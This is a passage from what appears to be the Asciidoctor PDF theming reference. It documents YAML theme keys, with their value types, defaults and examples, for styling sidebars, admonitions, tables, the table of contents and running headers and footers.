bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text-transform: uppercase\n|===\n\n. 
Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border-color: #ffffff\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text-transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background-color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background-color: #fffef7\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border-color: #eeeeee\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition 
type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column-rule-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column-rule-color: #aa0000\n\n|column-rule-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column-rule-style: double\n\n|column-rule-width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column-rule-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font-size: $base-font-size-large\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text-transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition-label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min-width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min-width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition-padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical-align: top\n\n3+|*Key Prefix:* admonition-label, admonition-label-<name>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text-transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition-icon-<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fas-fire\n\n|stroke-color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke-color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition-label-padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip-name: far-lightbulb` is not valid syntax).\n. 
Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fas-`) determines which font set to use.\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-svg]\n=== SVG\n\nThe keys in this category control the SVG integration.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-svg,svg>>\n\n|fallback_font_family^[1]^\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|svg:\n fallback_font_family: Times-Roman\n|===\n. The fallback font family is only used when the font family in the SVG does not map to a known font name from the font catalog.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line-height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n font-color: #5c6266\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|abstract:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line-height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|abstract:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $base-font-size)\n|abstract:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font 
style>> +\n(default: bold)\n|abstract:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n title:\n text-transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic-break>>\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic-break:\n border-color: #eeeeee\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic-break:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic-break:\n border-width: 0.5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic-break:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical-spacing)\n|thematic-break:\n margin-bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description-list>>\n\n|term-font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|description-list:\n term-font-style: italic\n\n|term-spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description-list:\n term-spacing: 5\n\n|description-indent\n|<<values,Number>> +\n(default: 30)\n|description-list:\n description-indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline-list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline-list:\n indent: 40\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline-list:\n item-spacing: 4\n\n|marker-font-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline-list:\n marker-font-color: #3c763d\n\n|text-align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|outline-list:\n text-align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. 
Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist-marker>>\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: $outline-list-marker-font-color)\n|ulist:\n marker:\n font-color: #cccccc\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|ulist:\n marker:\n line-height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist-marker-<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-family: fas\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-color: #ff0000\n\n|line-height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line-height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background-color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background-color: #ffffff\n\n|border-color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border-style: solid\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border-width: 0.5\n\n|caption-side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption-side: bottom\n\n|caption-max-width\n|fit-content {vbar} none +\n(default: fit-content)\n|table:\n caption-max-width: none\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font-family: Helvetica\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font-size: 9.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font-style: italic\n\n|grid-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n grid-color: #eeeeee\n\n|grid-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid-style: dashed\n\n|grid-width\n|<<values,Number>> +\n(default: $table-border-width)\n|table:\n grid-width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table-head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n head:\n background-color: #f0f0f0\n\n|border-bottom-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n head:\n border-bottom-color: #dddddd\n\n|border-bottom-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n head:\n border-bottom-style: 
dashed\n\n|border-bottom-width\n|<<values,Number>> +\n(default: 1.25)\n|table:\n head:\n border-bottom-width: 1\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n head:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n head:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n head:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font-style: normal\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text-transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table-body>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n body:\n background-color: #fdfdfd\n\n|stripe-background-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe-background-color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table-foot>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n foot:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n foot:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n foot:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n foot:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font-style: italic\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table-cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table-header-cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table-head-align)\n\/\/|table:\n\/\/ header-cell:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-head-background-color)\n|table:\n header-cell:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-head-font-color)\n|table:\n header-cell:\n font-color: #1a1a1a\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-head-font-family)\n|table:\n header-cell:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: $table-head-font-size)\n|table:\n header-cell:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $table-head-font-style)\n|table:\n header-cell:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $table-head-text-transform)\n|table:\n header-cell:\n text-transform: uppercase\n|===\n. 
This key only controls the color that is used for stripes.\nThe appearance of stripes is controlled using the `stripes` table attribute, the `table-stripes` document attribute (since Asciidoctor 2), or the `stripes` document attribute (prior to Asciidoctor 2).\nPermitted attribute values are even, odd, all, and none.\nPrior to Asciidoctor 2, even rows are shaded by default (e.g., `stripes=even`).\nSince Asciidoctor 2, table stripes are not enabled by default (e.g., `stripes=none`).\n
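\nFor example, to shade the even rows of your tables in Asciidoctor 2, you could set the `table-stripes` document attribute to `even` and pick the stripe color in your theme.\nHere's a sketch of the theme side (the color value is only illustrative):\n\n[source,yaml]\n----\ntable:\n body:\n stripe-background-color: #f5f5f5\n----\n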
\n[#keys-footnotes]\n=== Footnotes\n\nThe keys in this category control the style of the list of footnotes at the end of the chapter (book) or document (otherwise).\nIf the `footnotes-title` attribute is specified, it is styled as a block caption.\nThe styling of the links is controlled by the global link styles.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-footnotes]*Key Prefix:* <<key-prefix-footnotes,footnotes>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|footnotes:\n font-color: #cccccc\n\n|font-size\n|<<values,Number>> +\n(default: 9)\n|footnotes:\n font-size: 8\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|footnotes:\n font-style: italic\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 3)\n|footnotes:\n item-spacing: 5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|footnotes:\n margin-top: 10\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|footnotes:\n text-transform: lowercase\n|===\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font-style: bold\n\n|text-decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text-decoration: underline\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line-height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin-top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc-h<n> >>^[1]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3-font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text-decoration: none\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-h2-align)\n|toc:\n title:\n align: right\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-h2-font-color)\n|toc:\n title:\n font-color: #aa0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-h2-font-family)\n|toc:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $heading-h2-font-size)\n|toc:\n title:\n font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-h2-font-style)\n|toc:\n title:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-h2-text-transform)\n|toc:\n title:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc-dot-leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot-leader:\n content: \". \"\n\n|font-color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot-leader:\n font-color: #999999\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot-leader:\n font-style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot-leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font-style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf a value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\nPlease note that the running content will _not_ be used unless a) the periphery (header or footer) is configured and b) the height key for the periphery is assigned a value.\n\nCAUTION: If the height of the running content periphery is larger than the page margin, the running content will cover the main content.\nTo avoid this problem, reduce the height of the running content periphery or make the page margin on that side larger.\n
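\nFor example, here's a minimal sketch that turns on the running footer; if no content keys are specified, the footer shows the page number:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n----\n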
\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-running-content]*Key Prefix:* <<key-prefix-running-content,running-content>>\n\n|start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|running-content:\n start-at: toc\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|header:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|header:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|header:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|header:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|header:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical-align: middle\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|footer:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|footer:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|footer:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|footer:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|footer:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical-align: top\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. *If the height is not set, the running content at this periphery is disabled.*\n. If the side padding is negative, the content will bleed into the margin of the page.\n. 
